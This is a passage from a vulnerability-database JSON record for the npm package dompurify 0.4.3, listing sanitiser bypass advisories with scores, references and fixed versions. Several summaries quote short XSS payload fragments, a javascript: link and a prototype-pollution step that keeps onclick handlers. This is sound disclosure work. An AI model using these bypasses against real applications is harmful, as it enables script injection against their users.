{"url":"http://public2.vulnerablecode.io/api/packages/447249?format=json","purl":"pkg:npm/dompurify@0.4.3","type":"npm","namespace":"","name":"dompurify","version":"0.4.3","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.4.0","latest_non_vulnerable_version":"3.4.5","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359925?format=json","vulnerability_id":"VCID-37xc-54fs-8fh6","summary":"DOMPurify's ADD_TAGS function form bypasses FORBID_TAGS due to short-circuit evaluation\n## Summary\nIn `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation.\n\nThe condition:\n```\n!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])\n```\nWhen `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.\n\n## Inconsistency\nThis contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first:\n```\nif (FORBID_ATTR[lcName]) { continue; }\n```\nFor tags, FORBID should also take precedence over ADD.\n\n## Impact\nApplications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. 
Config-dependent but a genuine logic inconsistency.\n\n## Suggested Fix\nCheck `FORBID_TAGS` before `tagCheck`:\n```\nif (FORBID_TAGS[tagName]) { /* remove */ }\nelse if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }\n```\n\n## Affected Version\nv3.3.3 (commit 883ac15)","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp"},{"reference_url":"https://github.com/advisories/GHSA-39q2-94rc-95cp","reference_id":"GHSA-39q2-94rc-95cp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39q2-94rc-95cp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373307?format=json","purl":"pkg:npm/dompurify@3.4.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0"}],"aliases":["GHSA-39q2-94rc-95cp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37xc-54fs-8fh6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/81082?format=json","vulnerability_id":"VCID-3fxk-2qcb-jfa3","summary":"DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. 
At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41240","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04347","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04346","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04355","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04359","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41240"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41240","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41240"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892","reference_id":"1134892","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461147","reference_id":"2461147","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461147"},
{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/3.4.0","reference_id":"3.4.0","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/releases/tag/3.4.0"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80","reference_id":"c361baa18dbdcb3344a41110f4c48ad85bf48f80","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80"},{"reference_url":"https://github.com/advisories/GHSA-h7mw-gpvr-xq4m","reference_id":"GHSA-h7mw-gpvr-xq4m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h7mw-gpvr-xq4m"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m","reference_id":"GHSA-h7mw-gpvr-xq4m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N
/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:16476","reference_id":"RHSA-2026:16476","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:16476"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:21338","reference_id":"RHSA-2026:21338","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:21338"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:21772","reference_id":"RHSA-2026:21772","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:21772"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:22619","reference_id":"RHSA-2026:22619","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:22619"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:24977","reference_id":"RHSA-2026:24977","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:24977"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373307?format=json","purl":"pkg:npm/dompurify@3.4.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0"}],"aliases":["CVE-2026-41240","GHSA-h7mw-gpvr-xq4m"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3fxk-2qcb-jfa3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40257?format=json","vulnerability_id":"VCID-56ww-dvtp-8uc2","summary":"DOMPurify is a 
DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check. This renders dompurify unable to avoid cross site scripting (XSS) attacks. This issue has been addressed in versions 2.5.4 and 3.1.3 of DOMPurify. All users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45801","reference_id":"","reference_type":"","scores":[{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26786","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26788","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26802","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26586","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45801"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21","reference_id":"1e520262bf4c66b5efda49e2316d6d1246ca7b21","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/
AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2312631","reference_id":"2312631","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2312631"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc","reference_id":"26e1d69ca7f769f5c558619d644d90dd8bf26ebc","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45801","reference_id":"CVE-2024-45801","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45801"},{"reference_url":"https://github.com/advisories/GHSA-mmhx-hmjr-r674","reference_id":"GHSA-mmhx-hmjr-r674","reference_type":"","scores":[{"value":"HIGH",
"scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mmhx-hmjr-r674"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674","reference_id":"GHSA-mmhx-hmjr-r674","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10762","reference_id":"RHSA-2024:10762","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10762"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:11381","reference_id":"RHSA-2024:11381","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:11381"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7324","reference_id":"RHSA-2024:7324","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7324"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7706","reference_id":"RHSA-2024:7706","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7706"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8014","reference_id":"RHSA-2024:8014","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8014"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0892","reference_id"
:"RHSA-2025:0892","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0892"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4019","reference_id":"RHSA-2025:4019","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4019"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33397?format=json","purl":"pkg:npm/dompurify@2.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/33396?format=json","purl":"pkg:npm/dompurify@3.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3"}],"aliases":["CVE-2024-45801","GHSA-mmhx-hmjr-r674"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-56ww-dvtp-8uc2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359958?format=json","vulnerability_id":"VCID-77rz-yewt-77cq","summary":"DOMPurify USE_PROFILES prototype pollution allows event handlers\n## Summary\nWhen `USE_PROFILES` is 
enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.\n\n## Impact\nPrototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv"},{"reference_url":"https://github.com/advisories/GHSA-cj63-jhhr-wcxv","reference_id":"GHSA-cj63-jhhr-wcxv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cj63-jhhr-wcxv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-5
4fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-cj63-jhhr-wcxv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-77rz-yewt-77cq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359752?format=json","vulnerability_id":"VCID-8tpw-rcyz-xuhu","summary":"DOMPurify ADD_ATTR predicate skips URI validation\n## Summary\nDOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href=\"javascript:alert(document.domain)\">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. 
The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.\n\n## Impact\nPredicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r"},{"reference_url":"https://github.com/advisories/GHSA-cjmm-f4jc-qw8r","reference_id":"GHSA-cjmm-f4jc-qw8r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjmm-f4jc-qw8r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-cjmm-f4jc-qw8r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8tpw-rcyz-xuhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/161221?format=json","vulnerability_id":"VCID-fp9d-g1ya-qyfx","summary":"DOMPurify 
before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel=\"noopener noreferrer\"' attribute.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25155","reference_id":"","reference_type":"","scores":[{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47882","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47897","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.4774","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47881","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25155"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83"},{"reference_url":"https://github.com/cure53/DOMPurify/pull/337","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/pull/337"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25155","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25155"},{"reference_url":"https://github.com/cure53/DOMPurify/compare/1.0.10
...1.0.11","reference_id":"1.0.10...1.0.11","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/"}],"url":"https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11"},{"reference_url":"https://github.com/cure53/DOMPurify/pull/337/files","reference_id":"files","reference_type":"","scores":[{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/"}],"url":"https://github.com/cure53/DOMPurify/pull/337/files"},{"reference_url":"https://github.com/advisories/GHSA-8hgg-xxm5-3873","reference_id":"GHSA-8hgg-xxm5-3873","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hgg-xxm5-3873"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/381252?format=json","purl":"pkg:npm/dompurify@1.0.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gbb5-2vbk-suh8"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.11"}],"aliases":["CVE-2019-25155","GHSA-8hgg-xxm5-3873"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f
p9d-g1ya-qyfx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/205198?format=json","vulnerability_id":"VCID-gbb5-2vbk-suh8","summary":"Cross-Site Scripting in dompurify","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-16728","reference_id":"","reference_type":"","scores":[{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.77002","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.7693","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.7701","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.77017","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-16728"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html"},{"reference_url":"https://research.securitum.com/dompurify-bypass-using-mxss","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://research.securitum.com/dompurify-bypass-using-mxss"},{"reference_url":"https://research.securitum.com/dompurify-bypass-using-mxss/","reference_id":"","reference_type":"","scores":[],"url":"https://research.securitum.com/dompu